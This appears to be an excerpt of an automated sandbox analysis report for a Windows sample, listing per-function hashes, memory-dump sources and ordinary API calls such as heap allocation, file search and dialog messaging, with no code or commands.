• Opcode ID: 9c4465d60efdfc0a4e6690c892b09dee195eb5a3c9e9852b124163aa7f1b7afc
• Instruction ID: 48ba2026a105871a20de92f80c76445250154297100a344b9e8924da34c6a8d9
• Opcode Fuzzy Hash: 9c4465d60efdfc0a4e6690c892b09dee195eb5a3c9e9852b124163aa7f1b7afc
• Instruction Fuzzy Hash: 38419B70920709CFDB29DFA9C895BA9B7F0BF05304F54482DE05A9B352D734A865CF25
APIs
• __EH_prolog3_GS.LIBCMT ref: 00242C37
• Part of subcall function 0025880E: __EH_prolog3.LIBCMT ref: 00258815
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: H_prolog3H_prolog3_
• String ID:
• API String ID: 3355343447-0
• Opcode ID: 0ba66f60f906942f924c744378f90e12ad4faccd21f01e77777bd5f763362539
• Instruction ID: 35182fb5297a93254a892a6db4ff294ff724388d43b54d44aeabb2862c36885c
• Opcode Fuzzy Hash: 0ba66f60f906942f924c744378f90e12ad4faccd21f01e77777bd5f763362539
• Instruction Fuzzy Hash: D0310C7192120CEACF19EFE5D8D59EEBBB9AF18300F54012AF405B7251DB7099A9CF20
APIs
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: H_prolog3
• String ID:
• API String ID: 431132790-0
• Opcode ID: 5916d0d080048be0c438bee1772d10711276706b44c2af66114bbc4040d4125c
• Instruction ID: aff1a1dfd17e914bec60c6e44f17ac123cc69c0d088d140dc8d8e8e3948cc750
• Opcode Fuzzy Hash: 5916d0d080048be0c438bee1772d10711276706b44c2af66114bbc4040d4125c
• Instruction Fuzzy Hash: FE21D671D206229BEF189F748C49A5E76A4BF05314F05063AE909AB2C1D7749DA4CBE8
APIs
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: H_prolog3
• String ID:
• API String ID: 431132790-0
• Opcode ID: 8d35ae40094e22288e5b1c1d0948a77bde76c3fd01782c2b2d2a598cd423e0d4
• Instruction ID: c25bb44877a17e1ebcec2526ddcfaccb5cd5f37ae0be909208052d8c562f7bb6
• Opcode Fuzzy Hash: 8d35ae40094e22288e5b1c1d0948a77bde76c3fd01782c2b2d2a598cd423e0d4
• Instruction Fuzzy Hash: 3B21B572A1061A9BCB19DFE8CC81AAFB7B9BF88300F14001AF504B7241DB709E558B94
APIs
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: H_prolog3_
• String ID:
• API String ID: 2427045233-0
• Opcode ID: 16c7085abe4183ec508b7c9e46425f0cb0c814151e8a2fd16d26cbcc54836c41
• Instruction ID: 7e0060ba1971cbe9c7c0b095d1e50a91c75e2943ceb6dbc21a2e3d681666eaab
• Opcode Fuzzy Hash: 16c7085abe4183ec508b7c9e46425f0cb0c814151e8a2fd16d26cbcc54836c41
• Instruction Fuzzy Hash: 1A21E730621318AEEF25DF64C842FEEB3A9FF12758F161558F482A7181C7749D69CBA0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: H_prolog3_
• String ID:
• API String ID: 2427045233-0
• Opcode ID: e4ef6e9c7f72f6d7f17a38491f0297d6dd73c56bb2f89ad6890054588f484591
• Instruction ID: 5b78446a59a6dc104bc110177c1292159fc9118ca2c39c10b7c47a75364e10d6
• Opcode Fuzzy Hash: e4ef6e9c7f72f6d7f17a38491f0297d6dd73c56bb2f89ad6890054588f484591
• Instruction Fuzzy Hash: C4216F70920208DEDF09EFE4D886BDEBBB9AF48300F54001AF504E7291DA349AE5CF61
APIs
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: H_prolog3_
• String ID:
• API String ID: 2427045233-0
• Opcode ID: 429b43dd0885af3b86181a87051f79684850b4777e6de9f1cd201545228e4861
• Instruction ID: 93aa6f1445ed5c3c351e05ba427f8ed23f411f7c8d6391e0639e8dca8b76a574
• Opcode Fuzzy Hash: 429b43dd0885af3b86181a87051f79684850b4777e6de9f1cd201545228e4861
• Instruction Fuzzy Hash: 0B018171860218EADB01FBE0C886BDEB7BCAF14305F544065F404AB282C7389BA9CF71
APIs
• RtlAllocateHeap.NTDLL(00000000,0026535E,?,?,00266C16,?,?,?,?,?,00265269,0026535E,?,?,?,?), ref: 00270440
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                            • Opcode ID: 8988b5117bf3774b207b6c7b46e348eaf75759f7b872dbb8388660a98cdf3ba9
                                                                                                                                                                            • Instruction ID: 971c86f5acded8680aaee4c2419a56c039fbca23379487dcbee9155b44fd0c05
                                                                                                                                                                            • Opcode Fuzzy Hash: 8988b5117bf3774b207b6c7b46e348eaf75759f7b872dbb8388660a98cdf3ba9
                                                                                                                                                                            • Instruction Fuzzy Hash: 0BE09B31131222D6DA713FB5AC65B5B7A48EF413B0F1AC121FE4CA6191CBB0CC6485E1
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0024F826: __EH_prolog3_GS.LIBCMT ref: 0024F830
                                                                                                                                                                              • Part of subcall function 0024F826: FindFirstFileW.KERNELBASE(?,?,00000274,0024F733,000000FF,00000049,00000049,?,?,0024A684,?,?,00000000,?,?,?), ref: 0024F859
                                                                                                                                                                              • Part of subcall function 0024F826: FindFirstFileW.KERNEL32(?,?,?,?,?,0024D303,?,?,?,?,?,?,?,6294DA82,00000049), ref: 0024F8A4
                                                                                                                                                                              • Part of subcall function 0024F826: GetLastError.KERNEL32(?,?,?,0024D303,?,?,?,?,?,?,?,6294DA82,00000049,?,00000000), ref: 0024F902
                                                                                                                                                                            • FindClose.KERNELBASE(00000000,000000FF,00000049,00000049,?,?,0024A684,?,?,00000000,?,?,?,?,?,?), ref: 0024F739
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Find$FileFirst$CloseErrorH_prolog3_Last
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 765066492-0
                                                                                                                                                                            • Opcode ID: 5ceaa0b041567200773bbd248340eb1613f927ea00adf9b948e198d2f765618a
                                                                                                                                                                            • Instruction ID: f13b8e00ece7540c7c7547d26f8d6df46f12680f9846c6af22f474a42e43dc05
                                                                                                                                                                            • Opcode Fuzzy Hash: 5ceaa0b041567200773bbd248340eb1613f927ea00adf9b948e198d2f765618a
                                                                                                                                                                            • Instruction Fuzzy Hash: D9F08231419750EACF652B644904A8BBFD46F56360F104B09F0E912592C2749464DB22
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetThreadExecutionState.KERNEL32(00000001), ref: 0025742D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExecutionStateThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2211380416-0
                                                                                                                                                                            • Opcode ID: 13fe2329a4ba520c1d9efb59cbf4b74fdd1e769749824a956cb5970098553bd2
                                                                                                                                                                            • Instruction ID: 374b4f7ec99d4df6277ab2e65afa8d4da1fb5d074a5d5f291496ca2b4d042d36
                                                                                                                                                                            • Opcode Fuzzy Hash: 13fe2329a4ba520c1d9efb59cbf4b74fdd1e769749824a956cb5970098553bd2
                                                                                                                                                                            • Instruction Fuzzy Hash: 87D0C21072901022EE157B2438897FE190E4F82312F090029B804361938AE408AE97EE
                                                                                                                                                                            APIs
                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00241206
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Concurrency::cancel_current_task
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 118556049-0
                                                                                                                                                                            • Opcode ID: b6dbc1ff7d9b6923f3e65d4a1a5089bb0344b4586f9250eb3f5b27e450492f1d
                                                                                                                                                                            • Instruction ID: f5145a81073892ced3d5dc667e026a2b825afbd12bd11c088c9aefdb57e49220
                                                                                                                                                                            • Opcode Fuzzy Hash: b6dbc1ff7d9b6923f3e65d4a1a5089bb0344b4586f9250eb3f5b27e450492f1d
                                                                                                                                                                            • Instruction Fuzzy Hash: 28D05E766226134E872CEF34C46682E76946E50305720422DF52ADA681DF21CDB5CE15
                                                                                                                                                                            APIs
                                                                                                                                                                            • GdipAlloc.GDIPLUS(00000010), ref: 0025EB0C
                                                                                                                                                                              • Part of subcall function 0025E849: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0025E86A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1915507550-0
                                                                                                                                                                            • Opcode ID: 40d26e3062f3a0a4d923ad9eb1023a0fc0ac8bf0375a6db8f64136e7eac3b51d
                                                                                                                                                                            • Instruction ID: 22eb9dbedf3494fc5e0924d59550a98ad271efa95441730feec5e4f9ef491b7e
                                                                                                                                                                            • Opcode Fuzzy Hash: 40d26e3062f3a0a4d923ad9eb1023a0fc0ac8bf0375a6db8f64136e7eac3b51d
                                                                                                                                                                            • Instruction Fuzzy Hash: BAD0A730220209B6DF092F20CC0297E7698EF00346F408021BC0285150E9B0DB349554
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00264256
                                                                                                                                                                              • Part of subcall function 00260678: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00260689
                                                                                                                                                                              • Part of subcall function 00260678: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0026069A
                                                                                                                                                                              • Part of subcall function 00260678: IsDialogMessageW.USER32(000103E6,?), ref: 002606AE
                                                                                                                                                                              • Part of subcall function 00260678: TranslateMessage.USER32(?), ref: 002606BC
                                                                                                                                                                              • Part of subcall function 00260678: DispatchMessageW.USER32(?), ref: 002606C6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 897784432-0
                                                                                                                                                                            • Opcode ID: 9b79ed95ba8876f9adf2e6e9289e82591afb7c9dcc8965c0380c5c2d14cda8ef
                                                                                                                                                                            • Instruction ID: ff6fefe5407654fd80ebea395d5bcdc2fd5eba0827ca03cf19ccf46c2f303d5d
                                                                                                                                                                            • Opcode Fuzzy Hash: 9b79ed95ba8876f9adf2e6e9289e82591afb7c9dcc8965c0380c5c2d14cda8ef
                                                                                                                                                                            • Instruction Fuzzy Hash: B6D09E31154200AADA122B51DE0AF0A7AE6BB88B05F404555B745340F1C6629E71AF16
APIs
  • Part of subcall function 00264DD5: RtlAcquireSRWLockExclusive.NTDLL ref: 00264DF2
• DloadProtectSection.DELAYIMP ref: 00264D54
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: AcquireDloadExclusiveLockProtectSection
• String ID:
• API String ID: 3680172570-0
• Opcode ID: 483e694130309fe45e4ffe13130752be32532d6b28d8c905147f94b8530a0e04
• Instruction ID: aa4f5f8bf27d2dc029ddc7facff9f9c27a3cf9dc9461155473b8a9a70e977e4f
• Instruction Fuzzy Hash: ACD0C978A205719EDB16BF24AC4E7542250B305B08F800646E3D5865A4CBA944F09B61
APIs
• GetFileType.KERNELBASE(000000FF,0024E052,?,?,?,00000000,0024E5D2,?,?,00000000,?,00000000), ref: 0024E15E
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: FileType
• String ID:
• API String ID: 3081899298-0
• Opcode ID: 0f174369baa784e8f7ff9f0f58b6038dd32ad06e93e079bac77538e6df702ebb
• Instruction ID: 9248630f299fb6892065acebd39769e142dd0a14421feae55b38e900a6f5f687
• Instruction Fuzzy Hash: 52C0023445020AD6AF294E38A88949D7622BA527A67B59798D02D895A1C3328CA7EB11
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00264B3B
  • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 66919d0d4f48cce8cd9000051da6e289cdf710dc34f785d6311df1cd47920c45
• Instruction ID: 5b6d43fabb35bf96911764e12a95c7f095b1203bf29d7766b98fb468b4ff26ee
• Instruction Fuzzy Hash: 12B0128527D000AC310471099E03D3B010CC1C1B14330D32AF440C1485D4808CF10131
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00264B3B
  • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: fca6c572df7262921121a3c9213c1f117595a36595fdc8ab93c40a18d30d9342
• Instruction ID: e959cf091a968b587f8bf26c7b7a772a2b3e0de0eef4f3bdc8f5680aafc9754e
• Instruction Fuzzy Hash: BFB0128527D100AC320471099D03D37010CC1C1B14330932AF440C14C5D4808CF40135
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00264B3B
  • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 5824bc8839c243102585055fc5ac4001b0146b784a3488e4c01d940768fef332
• Instruction ID: 35f6f57a31b01e2f79b2ee1e72dcd57da0fb03e7ad21d8a21e64873f132a2af6
• Instruction Fuzzy Hash: EEB0128527D110EC310471095D03D37010CC1C1B14330D22AF840C1585D4809CF00131
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00264C90
  • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: effb08fe9106ef417de9b741e4dae6ceb556d38b648bc3028964ca96e77b64d1
• Instruction ID: 7d30d582204a217a2b7db933f1895cb862fc8a64d76a690ca93183a35aa3634e
• Instruction Fuzzy Hash: F7B012892BE000FC310831041F07C37010CC9D1B11331821BF440C048294804CF10031
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00264C90
  • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: e7a85dcf5ec7b5cfe0a9a9189318a8088fa1dd4482de6337828009724ebc88d0
                                                                                                                                                                            • Instruction ID: a3ccdfd3adfde8a667862610005eadd331743b2a144b96333e3bc7b4c6c9a4ad
